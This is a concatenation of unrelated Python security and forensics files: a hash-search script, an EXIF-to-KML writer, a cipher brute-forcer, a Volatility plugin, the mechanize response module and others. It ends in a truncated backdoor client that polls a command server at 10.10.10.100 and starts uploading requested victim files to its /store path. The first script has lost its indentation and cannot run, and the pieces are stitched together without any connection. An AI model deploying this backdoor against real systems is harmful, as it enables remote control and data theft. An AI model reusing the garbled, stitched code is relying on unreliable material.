SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_LOG = "C:/SYN/HashSearch/FORENSIC_LOG.txt"
SRC_HASH = "C:/SYN/HashSearch/Hashes.txt"
CSV = "C:/SYN/HashSearch/results.csv"
# LOG Constants used as input to LogEvent Function
LOG_DEBUG = 0 # Debugging Event
LOG_INFO = 1 # Information Event
LOG_WARN = 2 # Warning Event
LOG_ERR = 3 # Error Event
LOG_CRIT = 4 # Critical Event
LOG_OVERWRITE = True # Set this constant to True if the SCRIPT_LOG
                     # should be overwritten, False if not
# End of Script Constants
# Initialize Forensic Logging
try:
# If LOG should be overwritten before
# each run, the remove the old log
if LOG_OVERWRITE:
# Verify that the log exists before removing
if os.path.exists(SCRIPT_LOG):
os.remove(SCRIPT_LOG)
# Initialize the Log include the Level and message
logging.basicConfig(filename=SCRIPT_LOG, format='%(levelname)s\t:%(message)s', level=logging.DEBUG)
except:
print ("Failed to initialize Logging")
quit()
# End of Forensic Log Initialization
# Initialize CSV Output File
# Write Heading Line
try:
csvOut = open(CSV, "w")
csvOut.write("FileName, MD5 Hash, Match, Category \n")
except:
print ("Failed to initialize CSV File .. Make sure file is not open")
quit()
# Script Functions
'''
If you script will contain functions then insert them
here, before the execution of the main script. This
will ensure that the functions will be callable from
anywhere in your script
'''
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
# Function: LogEvent()
#
# Logs the event message and specified type
# Input:
# eventType: LOG_INFO, LOG_WARN, LOG_ERR, LOG_CRIT or LOG_DEBUG
# eventMessage : string containing the message to be logged
def LogEvent(eventType, eventMessage):
if type(eventMessage) == str:
try:
timeStr = GetTime('UTC')
# Combine current Time with the eventMessage
# You can specify either 'UTC' or 'LOCAL'
# Based on the GetTime parameter
eventMessage = str(timeStr)+": "+eventMessage
if eventType == LOG_INFO:
logging.info(eventMessage)
elif eventType == LOG_DEBUG:
logging.debug(eventMessage)
elif eventType == LOG_WARN:
logging.warning(eventMessage)
elif eventType == LOG_ERR:
logging.error(eventMessage)
elif eventType == LOG_CRIT:
logging.critical(eventMessage)
else:
logging.info(eventMessage)
except:
logging.warn("Event messages must be strings")
else:
logging.warn('Received invalid event message')
# End LogEvent Function =========================
# Simple CSV Write Method
# Without Library Assist
def WriteCSV(fileName, MD5, match, category):
if match:
csvOut.write(fileName+","+MD5+","+ "*** YES ***"+","+category+"\n")
else:
csvOut.write(fileName+","+MD5+","+ " "+","+""+"\n")
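
# A minimal sketch of chunked hashing for very large evidence files; the 64 KiB
# block size is an illustrative choice and this helper is not part of the
# original script (which reads each file in a single call).
def HashFileChunked(filePath, blockSize=65536):
    hasher = hashlib.md5()
    with open(filePath, 'rb') as f:
        # fixed-size reads keep memory use flat regardless of file size
        for block in iter(lambda: f.read(blockSize), ''):
            hasher.update(block)
    return hasher.hexdigest().upper()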
# Main Script Starts Here
#
# Script Overview
#
# The purpose of this script it to provide an example
# script that demonstrate and leverage key capabilities
# of Python that provides direct value to the
# forensic investigator.
if __name__ == '__main__':
# Mark the starting time of the main loop
theStart = time.time()
LogEvent(LOG_INFO, SCRIPT_NAME)
LogEvent(LOG_INFO, SCRIPT_VERSION)
LogEvent(LOG_INFO, "Script Started")
# Print Basic Script Information
# For MPE+ Scripts the length of the argument vector is
# always 2 scriptName, path
if len(argv) == 2:
scriptName, path = argv
else:
        LogEvent(LOG_INFO, str(argv) + " Invalid Command line")
quit()
LogEvent(LOG_INFO,"Command Line Argument Vector")
LogEvent(LOG_INFO,"Script Name: " + scriptName)
LogEvent(LOG_INFO,"Script Path: " + path)
# Verify the path exists and determine
# the path type
LogEvent(LOG_INFO, "Processing Command Line")
if os.path.exists(path):
LogEvent(LOG_INFO,"Path Exists")
if os.path.isdir(path):
LogEvent(LOG_INFO,"Path is a directory")
else:
LogEvent(LOG_ERR, path + " is not a directory")
quit()
else:
LogEvent(LOG_ERR, path + " Does not exist")
quit()
LogEvent(LOG_INFO, "Reading Hash Values to Search from: "+SRC_HASH)
LogEvent(LOG_INFO, "Creating Dictionary of Hashes")
hashDict = {}
try:
with open(SRC_HASH) as srcHashes:
# for each line in the file extract the hash and id
# then store the result in a dictionary
# key, value pair
# in this case the hash is the key and id is the value
LogEvent(LOG_INFO, "Hashes included in Search")
LogEvent(LOG_INFO, "========== HASHES INCLUDED IN SEARCH ==========")
for eachLine in srcHashes:
if eachLine != "END":
lineList = eachLine.split()
if len(lineList) >= 2:
hashKey = lineList[0].upper()
hashValue = ""
for eachElement in lineList[1:]:
hashValue = hashValue + " " + str(eachElement)
# Strip the newline from the hashValue
hashValue = hashValue.strip()
# Add the key value pair to the dictionary
if hashKey not in hashDict:
hashDict[hashKey] = hashValue
LogEvent(LOG_INFO, hashKey+": "+hashValue)
else:
LogEvent(LOG_WARN, "Duplicate Hash Found: " + hashKey)
else:
# Not a valid entry, continue to next line
continue
else:
break
LogEvent(LOG_INFO, "========== END HASH SEARCH LIST ==========")
except:
LogEvent(LOG_ERR, "Failed to load Hash List: "+SRC_HASH)
LogEvent(LOG_INFO, "========== FILE SEARCH START ==========")
# Create Empty matchList and filesProcessed Count
matchList = []
filesProcessed = 0
# Now process all files in the directory provided
# Including all subdirectories
for root, subdirs, files in os.walk(path):
for curFile in files:
# Create the full pathName
fullPath = os.path.join(root, curFile)
# Generate the hash for the current file
# Default is to use MD5
hasher = hashlib.md5()
with open(fullPath, 'rb') as theTarget:
filesProcessed += 1
# Read the contents of the file and hash them
fileContents = theTarget.read()
hasher.update(fileContents)
# get the resulting hashdigest
hashDigest = hasher.hexdigest().upper()
# Now check for a hash match against the
# list we read in by checking the contents of the dictionary
if hashDigest in hashDict:
# If we find a match log the match and add the match to the matchList
matchDetails = hashDict[hashDigest]
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ curFile)
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ hashDigest)
LogEvent(LOG_CRIT, " CATEGORGY >> "+ matchDetails)
# add entry to match list
matchList.append([curFile, hashDigest, matchDetails])
# add entry to the csv file
WriteCSV(curFile,hashDigest,True, matchDetails)
else:
# if no match simply log the file and associated hash value
LogEvent(LOG_INFO, "File >> " + curFile + " MD5 >> " + hashDigest)
# add entry to csv file
WriteCSV(curFile,hashDigest,False, "")
# All files are processed
# close the CSV File for good measure
csvOut.close()
# Post the end of file search to the log
LogEvent(LOG_INFO, "========== FILE SEARCH END ==========")
# Once we process all the files
# Log the contents of the match list
# at the end of the log file
# If any matches were found create a summary at
# the end of the log
if matchList:
LogEvent(LOG_INFO, "")
LogEvent(LOG_CRIT, "==== Matched Hash Summary Start ====")
for eachItem in matchList:
LogEvent(LOG_CRIT, "*** HASH MATCH File *** ")
LogEvent(LOG_CRIT, " MATCH File >> "+ eachItem[0])
LogEvent(LOG_CRIT, " MD5 DIGEST >> "+ eachItem[1])
LogEvent(LOG_CRIT, " CATEGORGY >> "+ eachItem[2])
LogEvent(LOG_CRIT, "==== Matched Hash Summary End ====")
# Record the End Time and calculate the elapsed time
theEnd = time.time()
elapsedTime = theEnd - theStart
# Log the number of Files Processed
# and the elapsed time
LogEvent(LOG_INFO, 'Files Processed: ' + str(filesProcessed))
LogEvent(LOG_INFO, 'Elapsed Time: ' + str(elapsedTime) + ' seconds')
# Now print the contents of the forensic log
with open(SCRIPT_LOG, 'r') as logData:
for eachLine in logData:
print(eachLine)
| 32.848485 | 104 | 0.560964 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20151107'
__version__ = 0.01
__description__ = 'KML Writer'
import os
import simplekml
def writer(output, output_name, output_data):
"""
The writer function writes JPEG and TIFF EXIF GPS data to a Google Earth KML file. This file can be opened
in Google Earth and will use the GPS coordinates to create 'pins' on the map of the taken photo's location.
:param output: The output directory to write the KML file.
:param output_name: The name of the output KML file.
:param output_data: The embedded EXIF metadata to be written
:return:
"""
kml = simplekml.Kml(name=output_name)
for exif in output_data:
        if ('Latitude' in exif.keys() and 'Latitude Reference' in exif.keys() and
                'Longitude Reference' in exif.keys() and 'Longitude' in exif.keys()):
if 'Original Date' in exif.keys():
dt = exif['Original Date']
else:
dt = 'N/A'
if exif['Latitude Reference'] == 'S':
latitude = '-' + exif['Latitude']
else:
latitude = exif['Latitude']
if exif['Longitude Reference'] == 'W':
longitude = '-' + exif['Longitude']
else:
longitude = exif['Longitude']
kml.newpoint(name=exif['Name'], description='Originally Created: ' + dt,
coords=[(longitude, latitude)])
kml.save(os.path.join(output, output_name))
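# Illustrative call (hypothetical paths and EXIF values, not from the original module):
#
#   writer('/cases/out', 'photos.kml',
#          [{'Name': 'IMG_0001.jpg', 'Original Date': '2015:11:07 10:02:00',
#            'Latitude': '40.7484', 'Latitude Reference': 'N',
#            'Longitude': '73.9857', 'Longitude Reference': 'W'}])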
| 34.045455 | 149 | 0.583387 |
cybersecurity-penetration-testing | # Transposition Cipher Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip, detectEnglish, transpositionDecrypt
def main():
# You might want to copy & paste this text from the source code at
# http://invpy.com/transpositionHacker.py
myMessage = """Cb b rssti aieih rooaopbrtnsceee er es no npfgcwu plri ch nitaalr eiuengiteehb(e1 hilincegeoamn fubehgtarndcstudmd nM eu eacBoltaeteeoinebcdkyremdteghn.aa2r81a condari fmps" tad l t oisn sit u1rnd stara nvhn fsedbh ee,n e necrg6 8nmisv l nc muiftegiitm tutmg cm shSs9fcie ebintcaets h aihda cctrhe ele 1O7 aaoem waoaatdahretnhechaopnooeapece9etfncdbgsoeb uuteitgna.rteoh add e,D7c1Etnpneehtn beete" evecoal lsfmcrl iu1cifgo ai. sl1rchdnheev sh meBd ies e9t)nh,htcnoecplrrh ,ide hmtlme. pheaLem,toeinfgn t e9yce da' eN eMp a ffn Fc1o ge eohg dere.eec s nfap yox hla yon. lnrnsreaBoa t,e eitsw il ulpbdofgBRe bwlmprraio po droB wtinue r Pieno nc ayieeto'lulcih sfnc ownaSserbereiaSm-eaiah, nnrttgcC maciiritvledastinideI nn rms iehn tsigaBmuoetcetias rn"""
hackedMessage = hackTransposition(myMessage)
if hackedMessage == None:
print('Failed to hack encryption.')
else:
print('Copying hacked message to clipboard:')
print(hackedMessage)
pyperclip.copy(hackedMessage)
def hackTransposition(message):
print('Hacking...')
# Python programs can be stopped at any time by pressing Ctrl-C (on
# Windows) or Ctrl-D (on Mac and Linux)
print('(Press Ctrl-C or Ctrl-D to quit at any time.)')
# brute-force by looping through every possible key
for key in range(1, len(message)):
print('Trying key #%s...' % (key))
decryptedText = transpositionDecrypt.decryptMessage(key, message)
if detectEnglish.isEnglish(decryptedText):
# Check with user to see if the decrypted key has been found.
print()
print('Possible encryption hack:')
print('Key %s: %s' % (key, decryptedText[:100]))
print()
print('Enter D for done, or just press Enter to continue hacking:')
response = input('> ')
if response.strip().upper().startswith('D'):
return decryptedText
return None
if __name__ == '__main__':
main()
| 45.94 | 785 | 0.680733 |
cybersecurity-penetration-testing | # Volatility
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
@author: Holger Macht
@license: GNU General Public License 2.0 or later
@contact: holger@homac.de
"""
import volatility.obj as obj
import volatility.plugins.linux.flags as linux_flags
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.proc_maps as linux_proc_maps
import volatility.plugins.linux.dalvik_vms as dalvik_vms
import volatility.plugins.linux.dalvik as dalvik
import sys, traceback
class dalvik_loaded_classes(linux_common.AbstractLinuxCommand):
"""Gather informationen about loaded classes a specific DalvikVM
instance knows about"""
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_GDVM_OFFSET(self._config)
dalvik.register_option_PID(self._config)
def calculate(self):
proc_maps = linux_proc_maps.linux_proc_maps(self._config).calculate()
dalvikVMs = dalvik_vms.dalvik_vms(self._config).calculate()
for task, gDvm in dalvikVMs:
for entry in gDvm.loadedClasses.dereference().get_entries():
clazz = obj.Object('ClassObject', offset = entry, vm = gDvm.loadedClasses.obj_vm)
yield task, clazz
def render_text(self, outfd, data):
self.table_header(outfd, [("PID", "5"),
("Offset", "10"),
("Descriptor", "70"),
("sourceFile", "30")])
for task, clazz in data:
if isinstance(clazz.obj_offset, int):
self.table_row(outfd,
task.pid,
hex(clazz.obj_offset),
dalvik.getString(clazz.descriptor),
dalvik.getString(clazz.sourceFile))
else:
self.table_row(outfd,
task.pid,
clazz.obj_offset,
dalvik.getString(clazz.descriptor),
dalvik.getString(clazz.sourceFile))
| 38.323529 | 97 | 0.662926 |
PenetrationTestingScripts | """Response classes.
The seek_wrapper code is not used if you're using UserAgent with
.set_seekable_responses(False), or if you're using the urllib2-level interface
HTTPEquivProcessor. Class closeable_response is instantiated by some handlers
(AbstractHTTPHandler), but the closeable_response interface is only depended
upon by Browser-level code. Function upgrade_response is only used if you're
using Browser.
Copyright 2006 John J. Lee <jjl@pobox.com>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file COPYING.txt
included with the distribution).
"""
import copy, mimetools, urllib2
from cStringIO import StringIO
def len_of_seekable(file_):
# this function exists because evaluation of len(file_.getvalue()) on every
# .read() from seek_wrapper would be O(N**2) in number of .read()s
pos = file_.tell()
file_.seek(0, 2) # to end
try:
return file_.tell()
finally:
file_.seek(pos)
# XXX Andrew Dalke kindly sent me a similar class in response to my request on
# comp.lang.python, which I then proceeded to lose. I wrote this class
# instead, but I think he's released his code publicly since, could pinch the
# tests from it, at least...
# For testing seek_wrapper invariant (note that
# test_urllib2.HandlerTest.test_seekable is expected to fail when this
# invariant checking is turned on). The invariant checking is done by module
# ipdc, which is available here:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/436834
## from ipdbc import ContractBase
## class seek_wrapper(ContractBase):
class seek_wrapper:
"""Adds a seek method to a file object.
This is only designed for seeking on readonly file-like objects.
Wrapped file-like object must have a read method. The readline method is
only supported if that method is present on the wrapped object. The
readlines method is always supported. xreadlines and iteration are
supported only for Python 2.2 and above.
Public attributes:
wrapped: the wrapped file object
is_closed: true iff .close() has been called
WARNING: All other attributes of the wrapped object (ie. those that are not
one of wrapped, read, readline, readlines, xreadlines, __iter__ and next)
are passed through unaltered, which may or may not make sense for your
particular file object.
"""
# General strategy is to check that cache is full enough, then delegate to
# the cache (self.__cache, which is a cStringIO.StringIO instance). A seek
# position (self.__pos) is maintained independently of the cache, in order
# that a single cache may be shared between multiple seek_wrapper objects.
# Copying using module copy shares the cache in this way.
def __init__(self, wrapped):
self.wrapped = wrapped
self.__read_complete_state = [False]
self.__is_closed_state = [False]
self.__have_readline = hasattr(self.wrapped, "readline")
self.__cache = StringIO()
self.__pos = 0 # seek position
def invariant(self):
# The end of the cache is always at the same place as the end of the
# wrapped file (though the .tell() method is not required to be present
# on wrapped file).
return self.wrapped.tell() == len(self.__cache.getvalue())
def close(self):
self.wrapped.close()
self.is_closed = True
def __getattr__(self, name):
if name == "is_closed":
return self.__is_closed_state[0]
elif name == "read_complete":
return self.__read_complete_state[0]
wrapped = self.__dict__.get("wrapped")
if wrapped:
return getattr(wrapped, name)
return getattr(self.__class__, name)
def __setattr__(self, name, value):
if name == "is_closed":
self.__is_closed_state[0] = bool(value)
elif name == "read_complete":
if not self.is_closed:
self.__read_complete_state[0] = bool(value)
else:
self.__dict__[name] = value
def seek(self, offset, whence=0):
assert whence in [0,1,2]
# how much data, if any, do we need to read?
if whence == 2: # 2: relative to end of *wrapped* file
if offset < 0: raise ValueError("negative seek offset")
# since we don't know yet where the end of that file is, we must
# read everything
to_read = None
else:
if whence == 0: # 0: absolute
if offset < 0: raise ValueError("negative seek offset")
dest = offset
else: # 1: relative to current position
pos = self.__pos
                if pos + offset < 0:
                    raise ValueError("seek to before start of file")
dest = pos + offset
end = len_of_seekable(self.__cache)
to_read = dest - end
if to_read < 0:
to_read = 0
if to_read != 0:
self.__cache.seek(0, 2)
if to_read is None:
assert whence == 2
self.__cache.write(self.wrapped.read())
self.read_complete = True
self.__pos = self.__cache.tell() - offset
else:
data = self.wrapped.read(to_read)
if not data:
self.read_complete = True
else:
self.__cache.write(data)
# Don't raise an exception even if we've seek()ed past the end
# of .wrapped, since fseek() doesn't complain in that case.
# Also like fseek(), pretend we have seek()ed past the end,
# i.e. not:
#self.__pos = self.__cache.tell()
# but rather:
self.__pos = dest
else:
self.__pos = dest
def tell(self):
return self.__pos
def __copy__(self):
cpy = self.__class__(self.wrapped)
cpy.__cache = self.__cache
cpy.__read_complete_state = self.__read_complete_state
cpy.__is_closed_state = self.__is_closed_state
return cpy
def get_data(self):
pos = self.__pos
try:
self.seek(0)
return self.read(-1)
finally:
self.__pos = pos
def read(self, size=-1):
pos = self.__pos
end = len_of_seekable(self.__cache)
available = end - pos
# enough data already cached?
if size <= available and size != -1:
self.__cache.seek(pos)
self.__pos = pos+size
return self.__cache.read(size)
# no, so read sufficient data from wrapped file and cache it
self.__cache.seek(0, 2)
if size == -1:
self.__cache.write(self.wrapped.read())
self.read_complete = True
else:
to_read = size - available
assert to_read > 0
data = self.wrapped.read(to_read)
if not data:
self.read_complete = True
else:
self.__cache.write(data)
self.__cache.seek(pos)
data = self.__cache.read(size)
self.__pos = self.__cache.tell()
assert self.__pos == pos + len(data)
return data
def readline(self, size=-1):
if not self.__have_readline:
raise NotImplementedError("no readline method on wrapped object")
# line we're about to read might not be complete in the cache, so
# read another line first
pos = self.__pos
self.__cache.seek(0, 2)
data = self.wrapped.readline()
if not data:
self.read_complete = True
else:
self.__cache.write(data)
self.__cache.seek(pos)
data = self.__cache.readline()
if size != -1:
r = data[:size]
self.__pos = pos+size
else:
r = data
self.__pos = pos+len(data)
return r
def readlines(self, sizehint=-1):
pos = self.__pos
self.__cache.seek(0, 2)
self.__cache.write(self.wrapped.read())
self.read_complete = True
self.__cache.seek(pos)
data = self.__cache.readlines(sizehint)
self.__pos = self.__cache.tell()
return data
def __iter__(self): return self
def next(self):
line = self.readline()
if line == "": raise StopIteration
return line
xreadlines = __iter__
def __repr__(self):
return ("<%s at %s whose wrapped object = %r>" %
(self.__class__.__name__, hex(abs(id(self))), self.wrapped))
class response_seek_wrapper(seek_wrapper):
"""
Supports copying response objects and setting response body data.
"""
def __init__(self, wrapped):
seek_wrapper.__init__(self, wrapped)
self._headers = self.wrapped.info()
def __copy__(self):
cpy = seek_wrapper.__copy__(self)
# copy headers from delegate
cpy._headers = copy.copy(self.info())
return cpy
# Note that .info() and .geturl() (the only two urllib2 response methods
# that are not implemented by seek_wrapper) must be here explicitly rather
# than by seek_wrapper's __getattr__ delegation) so that the nasty
# dynamically-created HTTPError classes in get_seek_wrapper_class() get the
# wrapped object's implementation, and not HTTPError's.
def info(self):
return self._headers
def geturl(self):
return self.wrapped.geturl()
def set_data(self, data):
self.seek(0)
self.read()
self.close()
cache = self._seek_wrapper__cache = StringIO()
cache.write(data)
self.seek(0)
class eoffile:
# file-like object that always claims to be at end-of-file...
def read(self, size=-1): return ""
def readline(self, size=-1): return ""
def __iter__(self): return self
def next(self): return ""
def close(self): pass
class eofresponse(eoffile):
def __init__(self, url, headers, code, msg):
self._url = url
self._headers = headers
self.code = code
self.msg = msg
def geturl(self): return self._url
def info(self): return self._headers
class closeable_response:
"""Avoids unnecessarily clobbering urllib.addinfourl methods on .close().
Only supports responses returned by mechanize.HTTPHandler.
After .close(), the following methods are supported:
.read()
.readline()
.info()
.geturl()
.__iter__()
.next()
.close()
and the following attributes are supported:
.code
.msg
Also supports pickling (but the stdlib currently does something to prevent
it: http://python.org/sf/1144636).
"""
# presence of this attr indicates is useable after .close()
closeable_response = None
def __init__(self, fp, headers, url, code, msg):
self._set_fp(fp)
self._headers = headers
self._url = url
self.code = code
self.msg = msg
def _set_fp(self, fp):
self.fp = fp
self.read = self.fp.read
self.readline = self.fp.readline
if hasattr(self.fp, "readlines"): self.readlines = self.fp.readlines
if hasattr(self.fp, "fileno"):
self.fileno = self.fp.fileno
else:
self.fileno = lambda: None
self.__iter__ = self.fp.__iter__
self.next = self.fp.next
def __repr__(self):
return '<%s at %s whose fp = %r>' % (
self.__class__.__name__, hex(abs(id(self))), self.fp)
def info(self):
return self._headers
def geturl(self):
return self._url
def close(self):
wrapped = self.fp
wrapped.close()
new_wrapped = eofresponse(
self._url, self._headers, self.code, self.msg)
self._set_fp(new_wrapped)
def __getstate__(self):
# There are three obvious options here:
# 1. truncate
# 2. read to end
# 3. close socket, pickle state including read position, then open
# again on unpickle and use Range header
# XXXX um, 4. refuse to pickle unless .close()d. This is better,
# actually ("errors should never pass silently"). Pickling doesn't
# work anyway ATM, because of http://python.org/sf/1144636 so fix
# this later
# 2 breaks pickle protocol, because one expects the original object
# to be left unscathed by pickling. 3 is too complicated and
# surprising (and too much work ;-) to happen in a sane __getstate__.
# So we do 1.
state = self.__dict__.copy()
new_wrapped = eofresponse(
self._url, self._headers, self.code, self.msg)
state["wrapped"] = new_wrapped
return state
def test_response(data='test data', headers=[],
url="http://example.com/", code=200, msg="OK"):
return make_response(data, headers, url, code, msg)
def test_html_response(data='test data', headers=[],
url="http://example.com/", code=200, msg="OK"):
    headers = headers + [("Content-type", "text/html")]  # avoid mutating the default list
return make_response(data, headers, url, code, msg)
def make_response(data, headers, url, code, msg):
"""Convenient factory for objects implementing response interface.
data: string containing response body data
headers: sequence of (name, value) pairs
url: URL of response
code: integer response code (e.g. 200)
msg: string response code message (e.g. "OK")
"""
mime_headers = make_headers(headers)
r = closeable_response(StringIO(data), mime_headers, url, code, msg)
return response_seek_wrapper(r)
def make_headers(headers):
"""
headers: sequence of (name, value) pairs
"""
hdr_text = []
for name_value in headers:
hdr_text.append("%s: %s" % name_value)
return mimetools.Message(StringIO("\n".join(hdr_text)))
# Rest of this module is especially horrible, but needed, at least until we
# fork urllib2. Even then, we may want to preserve urllib2 compatibility.
def get_seek_wrapper_class(response):
# in order to wrap response objects that are also exceptions, we must
# dynamically subclass the exception :-(((
if (isinstance(response, urllib2.HTTPError) and
not hasattr(response, "seek")):
if response.__class__.__module__ == "__builtin__":
exc_class_name = response.__class__.__name__
else:
exc_class_name = "%s.%s" % (
response.__class__.__module__, response.__class__.__name__)
class httperror_seek_wrapper(response_seek_wrapper, response.__class__):
# this only derives from HTTPError in order to be a subclass --
# the HTTPError behaviour comes from delegation
_exc_class_name = exc_class_name
def __init__(self, wrapped):
response_seek_wrapper.__init__(self, wrapped)
# be compatible with undocumented HTTPError attributes :-(
self.hdrs = wrapped.info()
self.filename = wrapped.geturl()
def __repr__(self):
return (
"<%s (%s instance) at %s "
"whose wrapped object = %r>" % (
self.__class__.__name__, self._exc_class_name,
hex(abs(id(self))), self.wrapped)
)
wrapper_class = httperror_seek_wrapper
else:
wrapper_class = response_seek_wrapper
return wrapper_class
def seek_wrapped_response(response):
"""Return a copy of response that supports seekable response interface.
Accepts responses from both mechanize and urllib2 handlers.
Copes with both ordinary response instances and HTTPError instances (which
can't be simply wrapped due to the requirement of preserving the exception
base class).
"""
if not hasattr(response, "seek"):
wrapper_class = get_seek_wrapper_class(response)
response = wrapper_class(response)
assert hasattr(response, "get_data")
return response
def upgrade_response(response):
"""Return a copy of response that supports Browser response interface.
Browser response interface is that of "seekable responses"
(response_seek_wrapper), plus the requirement that responses must be
useable after .close() (closeable_response).
Accepts responses from both mechanize and urllib2 handlers.
Copes with both ordinary response instances and HTTPError instances (which
can't be simply wrapped due to the requirement of preserving the exception
base class).
"""
wrapper_class = get_seek_wrapper_class(response)
if hasattr(response, "closeable_response"):
if not hasattr(response, "seek"):
response = wrapper_class(response)
assert hasattr(response, "get_data")
return copy.copy(response)
# a urllib2 handler constructed the response, i.e. the response is an
# urllib.addinfourl or a urllib2.HTTPError, instead of a
# _Util.closeable_response as returned by e.g. mechanize.HTTPHandler
try:
code = response.code
except AttributeError:
code = None
try:
msg = response.msg
except AttributeError:
msg = None
# may have already-.read() data from .seek() cache
data = None
get_data = getattr(response, "get_data", None)
if get_data:
data = get_data()
response = closeable_response(
response.fp, response.info(), response.geturl(), code, msg)
response = wrapper_class(response)
if data:
response.set_data(data)
return response
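
# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): exercises the
# seekable-response interface defined above. make_response() wraps body data
# in closeable_response + response_seek_wrapper, so unlike a raw socket-backed
# urllib2 response the body can be rewound, re-read, and read after .close().
if __name__ == "__main__":
    r = make_response("test body", [("Content-type", "text/plain")],
                      "http://example.com/", 200, "OK")
    assert r.read(4) == "test"          # first read pulls from the wrapped file
    r.seek(0)                           # rewind; data is now served from the cache
    assert r.read() == "test body"
    assert r.get_data() == "test body"  # get_data() restores the seek position
    r.close()
    assert r.read() == ""               # closeable_response stays usable after .close()
    print "seekable response demo passed"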
| 32.847909 | 80 | 0.598101 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
string = "TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOsTmPd"
n=2
answer = []
# Split the ciphertext into two-character chemical element symbols
symbols = [string[i:i+n] for i in range(0, len(string), n)]
print set(symbols)
# Each element's atomic number doubles as the ASCII code of a plaintext character
periodic = {"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge": 32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78, "Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71, "Os": 76, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80, "Ir": 77}
for value in symbols:
    if value in periodic:
        answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
#it is the function of science to discover the existence of a general reign of order in nature and to find the causes governing this order and this refers in equal measure to the relations of man - social and political - and to the entire universe as a whole.
| 61.857143 | 529 | 0.764973 |
cybersecurity-penetration-testing | import binascii
import logging
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
def checkHeader(filename, headers, size):
"""
The checkHeader function reads a supplied size of the file and checks against known signatures to determine
the file type.
:param filename: The name of the file.
:param headers: A list of known file signatures for the file type(s).
:param size: The amount of data to read from the file for signature verification.
:return: Boolean, True if the signatures match; otherwise, False.
"""
with open(filename, 'rb') as infile:
header = infile.read(size)
hex_header = binascii.hexlify(header)
for signature in headers:
if hex_header == signature:
return True
else:
pass
logging.warn('The signature for {} ({}) does not match known signatures: {}'.format(
filename, hex_header, headers))
return False
def convertSize(size):
"""
The convertSize function converts an integer representing bytes into a human-readable format.
:param size: The size in bytes of a file
:return: The human-readable size.
"""
sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB']
index = 0
while size > 1024:
size /= 1024.
index += 1
return '{:.2f} {}'.format(size, sizes[index])
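
# Hedged usage sketch (not part of the original module): 'photo.jpg' and the
# JPEG signatures below are illustrative values. checkHeader() hexlifies the
# first `size` bytes of the file and compares them to each candidate signature.
if __name__ == '__main__':
    jpeg_signatures = ['ffd8ffe0', 'ffd8ffe1']  # JFIF and EXIF JPEG variants
    if checkHeader('photo.jpg', jpeg_signatures, 4):
        print 'photo.jpg matches a known JPEG signature'
    print convertSize(123456789)  # -> '117.74 MB'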
| 32.309524 | 111 | 0.625179 |
Effective-Python-Penetration-Testing | import os,sys
from PIL import Image
from PIL.ExifTags import TAGS
# _getexif() returns None when the image carries no EXIF data, so guard first
exif = Image.open('image.jpg')._getexif()
if exif:
    for (tag, value) in exif.iteritems():
        print '%s = %s' % (TAGS.get(tag), value)
| 23.571429 | 60 | 0.643275 |
Python-for-Offensive-PenTest | '''
Installing Pillow
C:\Users\hkhrais>pip install Pillow
'''
# Python For Offensive PenTest
# Screen Capturing
import requests
import subprocess
import os
import time
from PIL import ImageGrab # Used to Grab a screenshot
import tempfile # Used to Create a temp directory
import shutil # Used to Remove the temp directory
while True:
req = requests.get('http://10.10.10.100')
command = req.text
if 'terminate' in command:
break
elif 'grab' in command:
grab,path=command.split('*')
if os.path.exists(path):
url = 'http://10.10.10.100/store'
